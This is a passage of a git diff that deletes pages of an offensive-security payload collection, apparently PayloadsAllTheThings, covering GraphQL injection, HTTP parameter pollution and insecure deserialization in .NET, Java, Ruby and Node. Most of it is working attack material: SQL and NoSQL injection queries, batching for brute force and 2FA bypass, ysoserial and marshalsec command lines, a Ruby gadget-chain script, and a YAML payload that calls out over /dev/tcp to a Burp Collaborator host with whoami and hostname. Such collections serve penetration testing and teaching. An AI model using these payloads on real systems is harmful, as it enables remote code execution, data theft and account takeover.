...InputValue - } - type { - ...TypeRef - } - isDeprecated - deprecationReason - } - inputFields { - ...InputValue - } - interfaces { - ...TypeRef - } - enumValues(includeDeprecated: true) { - name - description - isDeprecated - deprecationReason - } - possibleTypes { - ...TypeRef - } -} -fragment InputValue on __InputValue { - name - description - type { - ...TypeRef - } - defaultValue -} -fragment TypeRef on __Type { - kind - name - ofType { - kind - name - ofType { - kind - name - ofType { - kind - name - ofType { - kind - name - ofType { - kind - name - ofType { - kind - name - ofType { - kind - name - } - } - } - } - } - } - } -} - -query IntrospectionQuery { - __schema { - queryType { - name - } - mutationType { - name - } - types { - ...FullType - } - directives { - name - description - locations - args { - ...InputValue - } - } - } -} -``` - -Single line query to dump the database schema without fragments. - -```js -__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}} -``` - -### List path - -```php -$ git clone https://gitlab.com/dee-see/graphql-path-enum -$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill -Found 27 ways to reach the "Skill" node from the "Query" node: -- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill -- Query (query) -> Query (skills) -> Skill -``` - -### Extract data - -```js -example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}} -``` - -![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true) - - - -### Extract data using edges/nodes - -```json -{ - "query": "query { - teams{ - total_count,edges{ - node{ - id,_id,about,handle,state - } - } - } - }" -} -``` - -### Extract data using projections - -:warning: Don’t forget to escape the " inside the **options**. - -```json -{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}} -``` - - -### Enumerate the types' definition - -Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type - -```javascript -{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} -``` - -### Use mutations - -Mutations work like function, you can use them to interact with the GraphQL. - -```javascript -# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}} -# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}} -``` - -### NOSQL injection - -Use `$regex`, `$ne` from []() inside a `search` parameter. - -```json -{ - doctors( - options: "{\"limit\": 1, \"patients.ssn\" :1}", - search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }") - { - firstName lastName id patients{ssn} - } -} -``` - - -### SQL injection - -Send a single quote `'` inside a graphql parameter to trigger the SQL injection - -```powershell -{ - bacon(id: "1'") { - id, - type, - price - } -} -``` - -Simple SQL injection inside a graphql field. - -```powershell -curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27 -``` - -### GraphQL Batching Attacks - -Common scenario: -* Password Brute-force Amplification Scenario -* 2FA bypassing - -```powershell -mutation finishChannelVerificationMutation( - $input FinishChannelVerificationInput!, - $input2 FinishChannelVerificationInput!, - $input3 FinishChannelVerificationInput!, -){ - first: finishChannelVerificationMutation(input: $input){ - channel{ - id - option{ - ... onChannelSmsOptions{ - number - } - } - status - notificationSubscription(last: 1000){ etc... } - } - } - - - second: finishChannelVerificationMutation(input: $input2){...} - third: finishChannelVerificationMutation(input: $input3){...} -} -``` - - -## References - -* [Introduction to GraphQL](https://graphql.org/learn/) -* [GraphQL Introspection](https://graphql.org/learn/introspection/) -* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2) -* [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify](https://labs.detectify.com/2018/03/14/graphql-abuse/) -* [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e) -* [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber](https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b) -* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/) -* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066) -* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/) -* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) -* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) -* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) -* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) -* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) -* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) -* [GraphQL for Pentesters presentation by ACCEIS - 01/12/2022](https://acceis.github.io/prez-graphql/) - [source](https://github.com/Acceis/prez-graphql) diff --git a/HTTP Parameter Pollution/README.md b/HTTP Parameter Pollution/README.md deleted file mode 100644 index ad739b6..0000000 --- a/HTTP Parameter Pollution/README.md +++ /dev/null @@ -1,50 +0,0 @@ -# HTTP Parameter Pollution - - -## Summary - -HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate web logics or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name (?param1=value¶m1=value). As there is no formal way of parsing HTTP parameters, individual web technologies have their own unique way of parsing and reading URL parameters with the same name. Some taking the first occurrence, some taking the last occurrence, and some reading it as an array. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms. - - -## Tools - -No tools needed. Maybe Burp or OWASP ZAP. - -## How to test - -HPP allows an attacker to bypass pattern based/black list proxies or Web Application Firewall detection mechanisms. This can be done with or without the knowledge of the web technology behind the proxy, and can be achieved through simple trial and error. - -``` -Example scenario. -WAF - Reads first param -Origin Service - Reads second param. In this scenario, developer trusted WAF and did not implement sanity checks. - -Attacker -- http://example.com?search=Beth&search=' OR 1=1;## --> WAF (reads first 'search' param, looks innocent. passes on) --> Origin Service (reads second 'search' param, injection happens if no checks are done here.) -``` - -### Table of reference for which technology reads which parameter -When ?par1=a&par1=b -| Technology | Parsing Result |outcome (par1=)| -| ------------------ |--------------- |:-------------:| -| ASP.NET/IIS |All occurrences |a,b | -| ASP/IIS |All occurrences |a,b | -| PHP/Apache |Last occurrence |b | -| PHP/Zues |Last occurrence |b | -| JSP,Servlet/Tomcat |First occurrence |a | -| Perl CGI/Apache |First occurrence |a | -| Python Flask |First occurrence |a | -| Python Django |Last occurrence |b | -| Nodejs |All occurrences |a,b | -| Golang net/http - `r.URL.Query().Get("param")` |First occurrence |a | -| Golang net/http - `r.URL.Query()["param"]` |All occurrences |a,b | -| IBM Lotus Domino |First occurrence |a | -| IBM HTTP Server |First occurrence |a | -| Perl CGI/Apache |First occurrence |a | -| mod_wsgi (Python)/Apache |First occurrence |a | -| Python/Zope |All occurrences in array |['a','b'] | -| Ruby on Rails |Last occurrence |b | - -## References -- [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/) -- [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction) -- [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/) diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md deleted file mode 100644 index 1dbc23d..0000000 --- a/Insecure Deserialization/DotNET.md +++ /dev/null @@ -1,174 +0,0 @@ -# .NET Serialization - -## Summary - -* [Detection](#detection) -* [Tools](#tools) -* [Formatters](#formatters) - * [XmlSerializer](#xmlserializer) - * [DataContractSerializer](#datacontractserializer) - * [NetDataContractSerializer](#netdatacontractserializer) - * [LosFormatter](#losformatter) - * [JSON.NET](#jsonnet) - * [BinaryFormatter](#binaryformatter) -* [POP Gadgets](#pop-gadgets) -* [References](#references) - - -## Detection - -* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter -* `FF01` (Hex) / `/w` (Base64) = .NET ViewState - -Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` - - -## Tools - -* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net) -```ps1 -$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s -$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini -$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t -$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t -``` - -## Formatters - -![NETNativeFormatters.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Insecure%20Deserialization/Images/NETNativeFormatters.png?raw=true) -.NET Native Formatters from [pwntester/attacking-net-serialization](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=15) - -### XmlSerializer - -* In C# source code, look for `XmlSerializer(typeof());`. -* The attacker must control the **type** of the XmlSerializer. -* Payload output: **XML** - -```xml -.\ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "calc.exe" - - - - - - Parse - - - cmd/c calc.exe]]> - - - - - - -``` - - -### DataContractSerializer - -> The DataContractSerializer deserializes in a loosely coupled way. It never reads common language runtime (CLR) type and assembly names from the incoming data. The security model for the XmlSerializer is similar to that of the DataContractSerializer, and differs mostly in details. For example, the XmlIncludeAttribute attribute is used for type inclusion instead of the KnownTypeAttribute attribute. - -* In C# source code, look for `DataContractSerializer(typeof())`. -* Payload output: **XML** -* Data **Type** must be user-controlled to be exploitable - - -### NetDataContractSerializer - -> It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`. - -* In C# source code, look for `NetDataContractSerializer().ReadObject()`. -* Payload output: **XML** - -```ps1 -.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t -``` - -### LosFormatter - -* Use `BinaryFormatter` internally. - -```ps1 -.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t -``` - - -### JSON.NET - -* In C# source code, look for `JsonConvert.DeserializeObject(json, new JsonSerializerSettings`. -* Payload output: **JSON** - -```ps1 -.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc.exe" -t -{ - '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', - 'MethodName':'Start', - 'MethodParameters':{ - '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', - '$values':['cmd', '/c calc.exe'] - }, - 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} -} -``` - -### BinaryFormatter - -> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. - -* In C# source code, look for `System.Runtime.Serialization.Binary.BinaryFormatter`. -* Exploitation requires `[Serializable]` or `ISerializable` interface. -* Payload output: **Binary** - - -```ps1 -./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t -``` - - -## POP Gadgets - -These gadgets must have the following properties: -* Serializable -* Public/settable variables -* Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors - -You must carefully select your **gadgets** for a targeted **formatter**. - - -List of popular gadgets used in common payloads. -* **ObjectDataProvider** from `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll` - * Use `MethodParameters` to set arbitrary parameters - * Use `MethodName` to call an arbitrary function -* **ExpandedWrapper** - * Specify the `object types` of the objects that are encapsulated - ```cs - ExpandedWrapper myExpWrap = new ExpandedWrapper(); - ``` -* **System.Configuration.Install.AssemblyInstaller** - * Execute payload with Assembly.Load - ```cs - // System.Configuration.Install.AssemblyInstaller - public void set_Path(string value){ - if (value == null){ - this.assembly = null; - } - this.assembly = Assembly.LoadFrom(value); - } - ``` - - -## References - -* [Attacking .NET Serialization - Alvaro - October 20, 2017](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11) -* [Attacking .NET Deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) -* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - Slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) -* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf) -* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - DEF CON 25 Conference](https://www.youtube.com/watch?v=ZBfBYoK_Wr0) -* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - Slides](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf) -* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - White Paper](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf) -* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits) -* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) -* [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html) -* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - hacktricks](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net) -* [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Nov 2, 2021 - Shubham Shah](https://blog.assetnote.io/2021/11/02/sitecore-rce/) -* [Finding a New DataContractSerializer RCE Gadget Chain - November 7, 2019 - dugisec](https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/) \ No newline at end of file diff --git a/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb b/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb deleted file mode 100644 index b2fb3e5..0000000 --- a/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb +++ /dev/null @@ -1,66 +0,0 @@ -#!/usr/bin/env ruby - -class Gem::StubSpecification - def initialize; end -end - - -stub_specification = Gem::StubSpecification.new -stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2") - -puts "STEP n" -stub_specification.name rescue nil -puts - - -class Gem::Source::SpecificFile - def initialize; end -end - -specific_file = Gem::Source::SpecificFile.new -specific_file.instance_variable_set(:@spec, stub_specification) - -other_specific_file = Gem::Source::SpecificFile.new - -puts "STEP n-1" -specific_file <=> other_specific_file rescue nil -puts - - -$dependency_list= Gem::DependencyList.new -$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) - -puts "STEP n-2" -$dependency_list.each{} rescue nil -puts - - -class Gem::Requirement - def marshal_dump - [$dependency_list] - end -end - -payload = Marshal.dump(Gem::Requirement.new) - -puts "STEP n-3" -Marshal.load(payload) rescue nil -puts - - -puts "VALIDATION (in fresh ruby process):" -IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| - pipe.print payload - pipe.close_write - puts pipe.gets - puts -end - -puts "Payload (hex):" -puts payload.unpack('H*')[0] -puts - - -require "base64" -puts "Payload (Base64 encoded):" -puts Base64.encode64(payload) \ No newline at end of file diff --git a/Insecure Deserialization/Files/node-serialize.js b/Insecure Deserialization/Files/node-serialize.js deleted file mode 100644 index a22304c..0000000 --- a/Insecure Deserialization/Files/node-serialize.js +++ /dev/null @@ -1,5 +0,0 @@ -var y = { - rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}, -} -var serialize = require('node-serialize'); -console.log("Serialized: \n" + serialize.serialize(y)); \ No newline at end of file diff --git a/Insecure Deserialization/Files/ruby-serialize.yaml b/Insecure Deserialization/Files/ruby-serialize.yaml deleted file mode 100644 index 45da864..0000000 --- a/Insecure Deserialization/Files/ruby-serialize.yaml +++ /dev/null @@ -1,19 +0,0 @@ ---- -- !ruby/object:Gem::Installer - i: x -- !ruby/object:Gem::SpecFetcher - i: y -- !ruby/object:Gem::Requirement - requirements: - !ruby/object:Gem::Package::TarReader - io: &1 !ruby/object:Net::BufferedIO - io: &1 !ruby/object:Gem::Package::TarReader::Entry - read: 0 - header: "abc" - debug_output: &1 !ruby/object:Net::WriteAdapter - socket: &1 !ruby/object:Gem::RequestSet - sets: !ruby/object:Net::WriteAdapter - socket: !ruby/module 'Kernel' - method_id: :system - git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'" - method_id: :resolve \ No newline at end of file diff --git a/Insecure Deserialization/Images/NETNativeFormatters.png b/Insecure Deserialization/Images/NETNativeFormatters.png deleted file mode 100755 index ed5a5c2..0000000 Binary files a/Insecure Deserialization/Images/NETNativeFormatters.png and /dev/null differ diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md deleted file mode 100644 index c13b999..0000000 --- a/Insecure Deserialization/Java.md +++ /dev/null @@ -1,132 +0,0 @@ -# Java Deserialization - -## Detection - -- `"AC ED 00 05"` in Hex - * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol. - * `00 05`: STREAM_VERSION. The serialization version. -- `"rO0"` in Base64 -- Content-type = "application/x-java-serialized-object" -- `"H4sIAAAAAAAAAJ"` in gzip(base64) - -## Tools - -### Ysoserial - -[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. - -```java -java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin -java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin -java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin -java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 -``` - -**List of payloads included in ysoserial:** -```ps1 -Payload Authors Dependencies -------- ------- ------------ -AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 -BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 -C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 -Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 -Clojure @JackOfMostTrades clojure:1.8.0 -CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 -CommonsCollections1 @frohoff commons-collections:3.1 -CommonsCollections2 @frohoff commons-collections4:4.0 -CommonsCollections3 @frohoff commons-collections:3.1 -CommonsCollections4 @frohoff commons-collections4:4.0 -CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 -CommonsCollections6 @matthias_kaiser commons-collections:3.1 -CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 -FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 -Groovy1 @frohoff groovy:2.3.9 -Hibernate1 @mbechler -Hibernate2 @mbechler -JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -JRMPClient @mbechler -JRMPListener @mbechler -JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 -JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 -Jdk7u21 @frohoff -Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 -MozillaRhino1 @matthias_kaiser js:1.7R2 -MozillaRhino2 @_tint0 js:1.7R2 -Myfaces1 @mbechler -Myfaces2 @mbechler -ROME @mbechler rome:1.0 -Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE -Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 -URLDNS @gebl -Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 -Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 -``` - -### Burp extensions using ysoserial - -- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) -- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) -- [Burp-ysoserial](https://github.com/summitt/burp-ysoserial) -- [SuperSerial](https://github.com/DirectDefense/SuperSerial) -- [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) - -### Alternative Tooling - -- [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) -- [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool -- [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) -- [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool -- [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form -- [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe) -- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution - -```java -$ java -cp marshalsec.jar marshalsec. [-a] [-v] [-t] [ []] -$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc" -$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 - --a - generates/tests all payloads for that marshaller --t - runs in test mode, unmarshalling the generated payloads after generating them. --v - verbose mode, e.g. also shows the generated payload in test mode. -gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. -arguments - Gadget specific arguments -``` - -Payload generators for the following marshallers are included:
- -| Marshaller | Gadget Impact -| ------------------------------- | ---------------------------------------------- -| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization
various third party libraries RCEs -| Hessian|Burlap | various third party RCEs -| Castor | dependency library RCE -| Jackson | **possible JDK only RCE**, various third party RCEs -| Java | yet another third party RCE -| JsonIO | **JDK only RCE** -| JYAML | **JDK only RCE** -| Kryo | third party RCEs -| KryoAltStrategy | **JDK only RCE** -| Red5AMF(0|3) | **JDK only RCE** -| SnakeYAML | **JDK only RCEs** -| XStream | **JDK only RCEs** -| YAMLBeans | third party RCE - -## Gadgets - -Require: -* `java.io.Serializable` - - - - -## References - -- [Github - ysoserial](https://github.com/frohoff/ysoserial) -- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/) -- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/) -- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) -- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) -- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) -- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) -- [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) -- [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96) -- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md deleted file mode 100644 index 2f92304..0000000 --- a/Insecure Deserialization/Node.md +++ /dev/null @@ -1,49 +0,0 @@ -# Node Deserialization - -## Summary - -* [Exploit](#exploit) - * [node-serialize](#node-serialize) - * [funcster](#funcster) -* [References](#references) - -## Exploit - -* In Node source code, look for: - * `node-serialize` - * `serialize-to-js` - * `funcster` - -### node-serialize - -> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). - -1. Generate a serialized payload - ```js - var y = { - rce : function(){ - require('child_process').exec('ls /', function(error, - stdout, stderr) { console.log(stdout) }); - }, - } - var serialize = require('node-serialize'); - console.log("Serialized: \n" + serialize.serialize(y)); - ``` -2. Add bracket `()` to force the execution - ```js - 